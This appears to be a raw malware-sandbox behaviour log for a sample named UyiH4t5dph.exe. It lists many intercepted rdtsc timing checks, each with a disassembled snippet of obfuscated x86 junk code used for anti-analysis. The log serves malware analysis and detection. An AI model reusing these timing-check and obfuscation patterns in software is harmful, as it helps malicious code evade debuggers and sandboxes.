Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543038E second address: 5430407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8B29097h 0x00000008 call 00007FE6E8B29098h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 pushad 0x00000019 movsx edi, ax 0x0000001c pushfd 0x0000001d jmp 00007FE6E8B29098h 0x00000022 or eax, 246507C8h 0x00000028 jmp 00007FE6E8B2908Bh 0x0000002d popfd 0x0000002e popad 0x0000002f je 00007FE75AB872B6h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430407 second address: 543040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543040B second address: 5430411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430411 second address: 543045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FE6E8F184C0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE6E8F184BEh 0x0000001b xor si, BC88h 0x00000020 jmp 00007FE6E8F184BBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov dl, ch 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543045A second address: 5430473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test edx, 61000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8B2908Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430473 second address: 54304E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE75AF766C0h 0x00000011 jmp 00007FE6E8F184C9h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FE6E8F184C6h 0x00000022 jmp 00007FE6E8F184C5h 0x00000027 popfd 0x00000028 mov bx, si 0x0000002b popad 0x0000002c popad 0x0000002d jne 00007FE75AF76682h 0x00000033 pushad 0x00000034 mov dh, ah 0x00000036 push eax 0x00000037 push edx 0x00000038 movsx edx, si 0x0000003b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54304E3 second address: 5430505 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B29095h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420830 second address: 54208D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, 0EC5h 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007FE6E8F184C7h 0x0000001c sbb ax, 7E6Eh 0x00000021 jmp 00007FE6E8F184C9h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FE6E8F184BEh 0x00000030 mov ebp, esp 0x00000032 jmp 00007FE6E8F184C0h 0x00000037 and esp, FFFFFFF8h 0x0000003a pushad 0x0000003b mov ecx, 7A7775ADh 0x00000040 mov ax, BFA9h 0x00000044 popad 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FE6E8F184C4h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FE6E8F184BEh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54208D5 second address: 54208E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54208E7 second address: 542097B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov eax, edx 0x0000000c call 00007FE6E8F184C9h 0x00000011 mov edx, eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE6E8F184C6h 0x0000001d sbb ah, FFFFFF98h 0x00000020 jmp 00007FE6E8F184BBh 0x00000025 popfd 0x00000026 mov bl, ah 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c jmp 00007FE6E8F184BBh 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FE6E8F184BBh 0x0000003d sbb ah, 0000000Eh 0x00000040 jmp 00007FE6E8F184C9h 0x00000045 popfd 0x00000046 push ecx 0x00000047 pop ebx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 542097B second address: 5420994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420994 second address: 5420998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420998 second address: 54209B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54209B0 second address: 54209F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE6E8F184BBh 0x00000014 sub eax, 0561F42Eh 0x0000001a jmp 00007FE6E8F184C9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54209F3 second address: 5420A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FE75AB8EA19h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 mov esi, 4DECE343h 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f jmp 00007FE6E8B29096h 0x00000024 mov ecx, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE6E8B29097h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420A43 second address: 5420A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE75AF7DDF9h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420A6B second address: 5420AB8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE6E8B29096h 0x00000008 sub al, FFFFFFF8h 0x0000000b jmp 00007FE6E8B2908Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test byte ptr [77516968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE6E8B29097h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420AB8 second address: 5420AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420AD5 second address: 5420B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE75AB8E952h 0x0000000f jmp 00007FE6E8B2908Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE6E8B29097h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5420B1A second address: 5420BE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE6E8F184BEh 0x0000000f push eax 0x00000010 jmp 00007FE6E8F184BBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE6E8F184C4h 0x0000001d adc ax, 0238h 0x00000022 jmp 00007FE6E8F184BBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov cx, 0E67h 0x0000002f mov ecx, 44932A03h 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 mov ebx, 4FCB2E0Ah 0x0000003c jmp 00007FE6E8F184BBh 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FE6E8F184C6h 0x00000048 push dword ptr [ebp+14h] 0x0000004b jmp 00007FE6E8F184C0h 0x00000050 push dword ptr [ebp+10h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FE6E8F184C7h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E14 second address: 5430E34 instructions: 0x00000000 rdtsc 0x00000002 mov cl, C8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007FE6E8B2908Ah 0x0000000e mov bx, cx 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E34 second address: 5430E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E38 second address: 5430E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E3E second address: 5430E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E44 second address: 5430E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430E48 second address: 5430E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430B51 second address: 5430B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430B57 second address: 5430B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430B5B second address: 5430BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE6E8B29097h 0x00000012 sub ecx, 02722D6Eh 0x00000018 jmp 00007FE6E8B29099h 0x0000001d popfd 0x0000001e mov ebx, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430BA2 second address: 5430BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430BA8 second address: 5430BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430BAC second address: 5430BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ch, 00h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430BBF second address: 5430C1A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE6E8B29095h 0x00000008 or ecx, 5B8CDF06h 0x0000000e jmp 00007FE6E8B29091h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007FE6E8B2908Ch 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8B29093h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0EC7 second address: 54A0EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8F184BFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0EE5 second address: 54A0EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0EFD second address: 54A0F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0F01 second address: 54A0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8B29099h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0F29 second address: 54A0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0F2D second address: 54A0F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0F33 second address: 54A0F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE6E8F184C0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dl, E9h 0x00000016 jmp 00007FE6E8F184C6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0337 second address: 54A033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A033B second address: 54A0341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0341 second address: 54A0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A0347 second address: 54A039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE6E8F184C6h 0x00000010 jmp 00007FE6E8F184C5h 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov bx, si 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE6E8F184C1h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A01B6 second address: 54A0207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE6E8B29099h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FE6E8B2908Ah 0x00000019 add si, B878h 0x0000001e jmp 00007FE6E8B2908Bh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544021D second address: 5440232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440232 second address: 544024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544024E second address: 5440252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440252 second address: 5440258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440258 second address: 544025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A059E second address: 54A05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A05BF second address: 54A05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A05C3 second address: 54A05C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A05C7 second address: 54A062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FE6E8F184C6h 0x0000000c sub ecx, 4BF33D68h 0x00000012 jmp 00007FE6E8F184BBh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE6E8F184C6h 0x00000020 push dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8F184C7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54A062B second address: 54A06C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FE6E8B2908Bh 0x0000000c xor ah, FFFFFFBEh 0x0000000f jmp 00007FE6E8B29099h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push dword ptr [ebp+08h] 0x0000001b jmp 00007FE6E8B2908Eh 0x00000020 push C19E2DE7h 0x00000025 pushad 0x00000026 jmp 00007FE6E8B29097h 0x0000002b jmp 00007FE6E8B29098h 0x00000030 popad 0x00000031 add dword ptr [esp], 3E62D21Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE6E8B29097h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4ED097 second address: 4ED0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE6E8F184B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450673 second address: 545068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8B2908Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545068B second address: 54506A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54506A3 second address: 54506CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE6E8B29095h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54507DE second address: 54507E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54507E2 second address: 54507E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54507E8 second address: 54507EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54507EE second address: 54507F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54507F2 second address: 545083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE6E8F184BEh 0x00000013 sbb cx, 7A08h 0x00000018 jmp 00007FE6E8F184BBh 0x0000001d popfd 0x0000001e mov eax, 61D3A87Fh 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edx, 0EBBDA76h 0x0000002b mov bl, 28h 0x0000002d popad 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545083F second address: 5450843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450843 second address: 5450849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450849 second address: 5450887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c pushad 0x0000000d call 00007FE6E8B2908Eh 0x00000012 movzx ecx, dx 0x00000015 pop edx 0x00000016 mov si, 64E3h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE6E8B29090h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450887 second address: 545088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545088D second address: 5450893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450893 second address: 5450897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450897 second address: 545089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545089B second address: 54508F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE6E8F184C0h 0x00000012 jmp 00007FE6E8F184C5h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007FE6E8F184C0h 0x0000001e jmp 00007FE6E8F184C5h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
